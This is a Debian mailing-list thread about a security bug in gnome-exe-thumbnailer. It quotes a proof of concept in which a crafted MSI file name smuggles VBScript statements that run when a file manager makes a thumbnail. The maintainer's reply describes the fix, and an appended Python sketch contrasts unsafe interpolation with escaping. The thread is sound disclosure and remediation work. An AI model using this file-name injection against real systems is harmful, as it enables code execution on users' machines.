Hi Nils,

I wasn't able to reproduce the exploit on my (64-bit) system with either Caja or Nautilus (it also required setting up a new wineprefix in ~/.wine). The msi thumbnail ended up generating without any version information tag at all.

Regardless, I've gone and replaced the VBScript-based parsing entirely with msitools' msiinfo in https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5; hopefully this should fix the issue. I'll tag a new release soon and look at pushing the fix to Debian.

(Also CC'ing the other maintainers, who I don't think are on the Debian Wine list)

Best,
James

On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
> Package: gnome-exe-thumbnailer
> Version: 0.9.4-2
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Dear Maintainer,
>
> the following PoC is copied verbatim from my post about the parsing issue:
> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>
> Proof of Concept
>
> Install Dependencies
>
> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and
> wixl. The wixl package is only needed to create MSI files that trigger the
> thumbnailer.
>
> If the proof of concept does not work, install winetricks and run winetricks
> wsh56 to upgrade the Windows Script Host.
>
> Create MSI Files
>
> Create a file named poc.xml with the following content:
>
> <?xml version="1.0" encoding="utf-8"?>
> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
> <Product Version="1.0"/>
> </Wix>
>
> Execute the following Bourne Shell code:
>
> wixl -o poc.msi poc.xml
> cp poc.msi "poc.msi\",0):Set
> fso=CreateObject(\"Scripting.FileSystemObject\"):Set
> poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>
> Trigger Execution
>
> Start GNOME Files and navigate to the folder with the MSI files. An empty
> file with the name badtaste.txt should appear.
>
> *** End of the template - remove these template lines ***
>
>
> -- System Information:
> Debian Release: 9.0
> APT prefers stable
> APT policy: (500, 'stable')
> Architecture: i386 (i686)
>
> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: sysvinit (via /sbin/init)
>
> Versions of packages gnome-exe-thumbnailer depends on:
> ii icoutils 0.31.2-1.1
> ii imagemagick 8:6.9.7.4+dfsg-11
> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
> ii libglib2.0-bin 2.50.3-2
>
> Versions of packages gnome-exe-thumbnailer recommends:
> pn wine
> <none>
> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev
> <none>
>
> gnome-exe-thumbnailer suggests no packages.
>
> -- no debconf information
>
> _______________________________________________
> pkg-wine-party mailing list
> pkg-wine-pa...@lists.alioth.debian.org
> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>
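The file name in the quoted proof of concept contains a double quote followed by VBScript statements. As an added example (not code from the report, the reply or gnome-exe-thumbnailer), this Python sketch feeds that file name through a hypothetical VBScript template and compares plain interpolation, quote doubling, and handing the path over as a single argv element; `TEMPLATE` and the `msiinfo export ... Property` arguments are assumptions.

```python
# Added illustration. TEMPLATE is a hypothetical stand-in for a generated
# VBScript line, not code taken from gnome-exe-thumbnailer.
TEMPLATE = 'Set db = installer.OpenDatabase("{path}", 0)'

# File name created by the cp command in the quoted report.
POC_NAME = ('poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject")'
            ':Set poc=fso.CreateTextFile("badtaste.txt")\'.msi')


def code_outside_literals(line):
    """Return the parts of a VBScript line that are not inside "..." literals."""
    out, in_str, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            if in_str and line[i + 1:i + 2] == '"':
                i += 2          # "" inside a literal is an escaped quote
                continue
            in_str = not in_str
        elif not in_str:
            if ch == "'":       # apostrophe outside a literal starts a comment
                break
            out.append(ch)
        i += 1
    return "".join(out)


def vbs_quote(value):
    """Escape a value for a VBScript string literal by doubling quotes."""
    if "\n" in value or "\r" in value:
        raise ValueError("line breaks cannot appear in a VBScript literal")
    return value.replace('"', '""')


def unsafe_script(path):
    # Plain interpolation: a quote in the file name ends the literal early.
    return TEMPLATE.format(path=path)


def escaped_script(path):
    # Quote doubling keeps the whole file name inside one literal.
    return TEMPLATE.format(path=vbs_quote(path))


def msiinfo_argv(path):
    # No generated script at all: the path is data in one argv element.
    # The subcommand and table name are assumed, not taken from the commit.
    return ["msiinfo", "export", path, "Property"]
```

With the PoC name, `code_outside_literals(unsafe_script(POC_NAME))` contains `CreateObject`, while the escaped variant leaves only the template's own code outside string literals.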